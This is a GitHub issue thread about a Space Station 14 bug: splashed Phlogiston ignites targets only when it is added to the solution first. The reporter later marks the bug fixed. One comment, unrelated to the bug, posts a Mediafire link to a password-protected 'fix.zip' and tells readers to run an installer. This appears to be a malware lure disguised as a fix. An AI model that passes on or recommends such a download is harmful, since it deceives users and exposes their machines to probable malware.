### ISSUE TITLE
Phlogiston, and burn getting put out by napalm

### ISSUE THREAD

**Issue by iaada** [space-wizards/space-station-14#31473]
When you splash someone with Phlogiston, it only sometimes lights people on fire. From testing it appears to be related to the order of the phlog in the solution.
Repo: Add 5 of anything, then 5 phlog in a beaker. When you splash, it won't ignite. But add phlog first and they *will* ignite. This includes chems that you could expect to increase the fire like napalm.

This doesn't seem to have been caused by the commit at #30955. Though that also seems to suffer from order of metabolizing, as the amount of damage and fire stacks wildly varies each time an Urist is injected with 5 napalm and 5 phlog.

This issue seems to be the same issue mentioned here #28445.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iaada** [comment]
Fixed as of #31930
